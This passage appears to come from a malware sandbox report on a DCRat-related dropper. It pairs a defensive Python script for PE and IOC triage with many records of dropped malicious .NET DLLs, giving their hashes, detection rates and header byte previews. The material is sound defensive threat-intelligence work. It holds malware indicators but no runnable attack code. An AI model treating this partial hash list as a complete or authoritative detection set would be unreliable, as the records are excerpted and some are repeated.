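    directories start at +96 (PE32) or +112 (PE32+); entry 14 is the CLR header.
    """
    try:
        if data[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        coff = e_lfanew + 4
        machine, _nsec, tstamp, _, _, _opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
        opt = coff + 20
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic not in (0x10B, 0x20B):
            return None
        pe32 = magic == 0x10B
        subsystem = struct.unpack_from("<H", data, opt + 68)[0]
        n_dirs = struct.unpack_from("<I", data, opt + (92 if pe32 else 108))[0]
        clr_rva = clr_size = 0
        if n_dirs > CLR_RUNTIME_HEADER_INDEX:
            dirs = opt + (96 if pe32 else 112)
            clr_rva, clr_size = struct.unpack_from("<II", data, dirs + CLR_RUNTIME_HEADER_INDEX * 8)
    except struct.error:
        return None
    return {
        "machine": machine,
        "pe32": pe32,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "console": subsystem == IMAGE_SUBSYSTEM_WINDOWS_CUI,
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "timestamp": tstamp,
        "timestamp_utc": datetime.fromtimestamp(tstamp, timezone.utc).isoformat(),
    }


def build_synthetic_dotnet_dll(timestamp: int) -> bytes:
    """Constructed header-only PE32 DLL with a CLR directory (no sections; not loadable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew: PE signature follows DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 224, 0x2102)  # i386; DLL|EXECUTABLE|32BIT_MACHINE
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<H", opt, 68, IMAGE_SUBSYSTEM_WINDOWS_CUI)
    struct.pack_into("<I", opt, 92, 16)                             # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + CLR_RUNTIME_HEADER_INDEX * 8, 0x2008, 0x48)  # CLR header RVA/size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def triage(data: bytes) -> dict:
    """The report's per-file fields plus an IOC match against REPORT_SHA256."""
    h = hashes(data)
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy_8bit(data),
        **h,
        "in_report": h["SHA-256"] in REPORT_SHA256,
        "pe": pe_info(data),
    }


if __name__ == "__main__":
    import sys
    # Pass a path to triage a real file; with no argument the constructed header is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_synthetic_dotnet_dll(0x64ABCDEF)
    for field, value in triage(blob).items():
        print(f"{field}: {value}")
```

Run it against a file recovered from a host and compare the output line by line with an entry above: a SHA-256 hit in `REPORT_SHA256` is a direct IOC match, while matching size, entropy and PE flags without a hash hit points at a rebuilt or re-obfuscated variant of the same dropper component.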
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):126976
                                                                                                                      Entropy (8bit):6.057993947082715
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                      MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                      SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                      SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                      SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33792
                                                                                                                      Entropy (8bit):5.541771649974822
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):46592
                                                                                                                      Entropy (8bit):5.870612048031897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69632
                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34304
                                                                                                                      Entropy (8bit):5.618776214605176
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):39936
                                                                                                                      Entropy (8bit):5.660491370279985
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                      MD5:240E98D38E0B679F055470167D247022
                                                                                                                      SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                      SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                      SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):64000
                                                                                                                      Entropy (8bit):5.857602289000348
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):41472
                                                                                                                      Entropy (8bit):5.6808219961645605
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34816
                                                                                                                      Entropy (8bit):5.636032516496583
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):50176
                                                                                                                      Entropy (8bit):5.723168999026349
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69632
                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):46592
                                                                                                                      Entropy (8bit):5.870612048031897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):70144
                                                                                                                      Entropy (8bit):5.909536568846014
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34304
                                                                                                                      Entropy (8bit):5.618776214605176
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):39936
                                                                                                                      Entropy (8bit):5.629584586954759
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                      MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                      SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                      SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                      SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33792
                                                                                                                      Entropy (8bit):5.541771649974822
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):342528
                                                                                                                      Entropy (8bit):6.170134230759619
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                      MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                      SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                      SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                      SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):126976
                                                                                                                      Entropy (8bit):6.057993947082715
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                      MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                      SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                      SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                      SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 39936
Entropy (8bit): 5.660491370279985
Encrypted: false
SSDEEP: 768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5: 240E98D38E0B679F055470167D247022
SHA1: 49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256: C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512: 93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%

Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: ASCII text, with very long lines (528), with no line terminators
Category: dropped
Size (bytes): 528
Entropy (8bit): 5.86146629288854
Encrypted: false
SSDEEP: 12:7G6L9eqdASkAEXjaXl+9vBLm4fhBxAP/K+26Hzjm/UbbbZyj:7G6LFOSkhO1+9v5muXuK+2ujmCb8
MD5: 003966389C0FE84EEB10466BF228C2E1
SHA1: 4EE62E74BFC80741615218F35B5F35EF23AD16BD
SHA-256: 5E1DF552863B72CAB377F7F6025882BBC84D302AA5A074DD1A19261EB185BA84
SHA-512: 03B7D6C2380261AA05E412761E02AC0BD6ABC9294CF4FF55670A0DD17F1667D9C0B346BC2DC406B7723101FDF033FEBA0594DB27E5D99C1E66DB9D4851DD9198
Malicious: false

Process: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3538432
Entropy (8bit): 7.811102685383502
Encrypted: false
SSDEEP: 49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
MD5: 26C2B88440A62B4CB79201E01A404BD2
SHA1: AD784AF316C9674AB5963D9F3144EAB1A41DA087
SHA-256: B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
SHA-512: EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%

Process: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 90
Entropy (8bit): 5.126365840889883
Encrypted: false
SSDEEP: 3:sr8xXuwDbQI+rh9hHkjYmVNBvpjvAn:sAZXDMI+rh9hHkjYiN5in
MD5: 5095F6A2A1E4C13B9F5AEBE3AB33F46C
SHA1: 7064BE6BE58473F6061DFEEC53B5D9EE133C2EBF
